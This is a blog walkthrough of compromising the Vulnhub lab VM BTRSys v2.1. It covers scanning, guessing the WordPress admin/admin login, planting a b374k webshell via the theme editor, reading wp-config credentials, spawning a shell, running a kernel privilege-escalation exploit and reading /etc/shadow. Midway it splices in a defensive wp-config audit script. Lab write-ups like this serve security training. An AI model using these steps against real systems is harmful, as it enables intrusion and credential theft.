OK, one last Vulnhub VM for today. This time it is the second in the series: Resimler: BTRSys v2.1. This one is a bit more difficult than the previous one, but only marginally.
Getting this VM up and running is a pain. The first time I tried to import it in VMware it complained about the vmdk. It's a simple fix: the name is wrong in the .ova, so simply open it in a text editor and rename the file it is looking for to the correct one.
First things first, a port scan. We get the following:
21 – vsftpd 3.0.3
22 – OpenSSH 7.2p2 Ubuntu 4ubuntu2.1
80 – Apache httpd 2.4.18
Again, FTP allows anonymous login, but there is nothing there.
Loading the webapp in a browser we are greeted with a gif of a snake but not much else. Examining robots.txt gives us /wordpress/.
So I kick off the usual tools, wpscan, nikto and dirb (with seclists big.txt).
Nikto doesn't give much useful information, and the best dirb gives is /upload/, which simply replies with:
Connection failed: SQLSTATE[HY000]  Unknown database ‘Lepton’
WPScan, however, lists a whole host of issues. Here is a snippet of what I found:
[!] The WordPress 'http://192.168.1.144/wordpress/readme.html' file exists exposing a version number
[+] Interesting header: SERVER: Apache/2.4.18 (Ubuntu)
[+] XML-RPC Interface available under: http://192.168.1.144/wordpress/xmlrpc.php
[!] Upload directory has directory listing enabled: http://192.168.1.144/wordpress/wp-content/uploads/
[!] Includes directory has directory listing enabled: http://192.168.1.144/wordpress/wp-includes/
[+] WordPress version 3.9.14 (Released on 2016-09-07) identified from advanced fingerprinting, meta generator, readme, links opml, stylesheets numbers
- loads of vulns as old version -
[+] Identified the following 2 user/s:
+----+--------+--------+
| Id | Login  | Name   |
+----+--------+--------+
| 1  | btrisk | btrisk |
| 2  | admin  | admin  |
+----+--------+--------+
I try both usernames with the username as the password and log in with the username/password of admin/admin. That was surprisingly easy!
Once in, I used the "edit themes" option to edit "content-audio.php" to contain the b374k PHP webshell. I visited the URL in a browser and was greeted with a webshell. From there I pulled the wp-config.php:
define('DB_NAME', 'wordpress');
define('DB_USER', 'root');
define('DB_PASSWORD', 'rootpassword!');
define('DB_HOST', 'localhost');
And the /etc/passwd file, which turned out to ultimately be no use. After realizing that python wasn't installed, I uploaded LinEnum.sh to /tmp, chmodded it and ran it to get the following:
Linux version 4.4.0-62-generic (buildd@lcy01-30) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.4)
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04.2 LTS"
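Seen from the defending side, the wp-config.php values pulled above and the theme-editor route used to plant the webshell can both be caught by a configuration audit. The script below is an added example, not part of the original post: it parses the define() calls and flags a root database user, a guessable database password and a missing DISALLOW_FILE_EDIT. The sample config is constructed from the values shown above, and the 16-character password threshold is an assumption.

```python
import re

# Constructed sample: the four values are the ones pulled from wp-config.php above.
SAMPLE_WP_CONFIG = """<?php
define('DB_NAME', 'wordpress');
define('DB_USER', 'root');
define('DB_PASSWORD', 'rootpassword!');
define('DB_HOST', 'localhost');
// define('DISALLOW_FILE_EDIT', true);  commented out, so it must not count
"""

DEFINE_RE = re.compile(
    r"""define\(\s*['"](\w+)['"]\s*,\s*(?:'([^']*)'|"([^"]*)"|(\w+))\s*\)""")

def parse_defines(text):
    """Return {constant: value} for every active define() in a wp-config.php."""
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.S)   # drop block comments
    found = {}
    for line in text.splitlines():
        if line.lstrip().startswith(("//", "#")):        # drop commented-out lines
            continue
        for name, single, double, bare in DEFINE_RE.findall(line):
            found[name] = bare.lower() if bare else (single or double)
    return found

def audit(text):
    """Return (constant, problem) findings for the weaknesses seen in this VM."""
    cfg, findings = parse_defines(text), []
    user = cfg.get("DB_USER", "").lower()
    password = cfg.get("DB_PASSWORD", "").lower()
    if user == "root":
        findings.append(("DB_USER", "WordPress connects as MySQL root; use an "
                         "account limited to its own database"))
    # Heuristic (assumed threshold): short, or built from the user name / "password".
    if len(password) < 16 or (user and user in password) or "password" in password:
        findings.append(("DB_PASSWORD", "short or guessable database password"))
    if "true" not in (cfg.get("DISALLOW_FILE_EDIT"), cfg.get("DISALLOW_FILE_MODS")):
        findings.append(("DISALLOW_FILE_EDIT", "dashboard theme/plugin editor is "
                         "enabled; any admin login can rewrite PHP files"))
    return findings

if __name__ == "__main__":
    for constant, problem in audit(SAMPLE_WP_CONFIG):
        print(f"[!] {constant}: {problem}")
```

Setting DISALLOW_FILE_EDIT to true in wp-config.php removes the theme and plugin editors from the dashboard, so a guessed admin password no longer gives direct write access to PHP files.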
Running out of ideas, I uploaded a meterpreter reverse shell and launched it. From there I could spawn a shell using:
/usr/bin/python3.5 -c 'import pty; pty.spawn("/bin/sh")'
There didn't seem to be any suid binaries to exploit, so I did a quick Google for kernel exploits, which led me to: https://www.exploit-db.com/exploits/41458/
The machine didn't have GCC installed, and the version I did find on it I didn't have permissions to use. So I compiled it locally and uploaded it, then ran the following:
$ chmod +x pwn
chmod +x pwn
$ ./pwn
./pwn
[.] namespace sandbox setup successfully
[.] disabling SMEP & SMAP
[.] scheduling 0xffffffff81064550(0x406e0)
[.] waiting for the timer to execute
[.] done
[.] SMEP & SMAP should be off now
[.] getting root
[.] executing 0x55e02688defd
[.] done
[.] should be root now
[.] checking if we got root
[+] got r00t ^_^
[!] don't kill the exploit binary, the kernel will crash
root@ubuntu:/tmp#
And that is game over 🙂
Again there was no flag in /root so I grabbed the shadow files as proof. I haven’t cracked the hashes as I don’t see the point already having a root shell.
root@ubuntu:/root# ls -la
ls -la
total 32
drwx------  4 root root 4096 Apr 28 02:24 .
drwxr-xr-x 22 root root 4096 Mar 17  2017 ..
-rw-------  1 root root  505 May  2 08:57 .bash_history
-rw-r--r--  1 root root 3106 Oct 22  2015 .bashrc
drwx------  2 root root 4096 Apr 28 02:24 .cache
-rw-------  1 root root  215 Apr 27 12:11 .mysql_history
drwxr-xr-x  2 root root 4096 Mar 21  2017 .nano
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
root@ubuntu:/root# cat /etc/shadow
cat /etc/shadow
Thanks for another fun Boot2Root @ismailonderkaya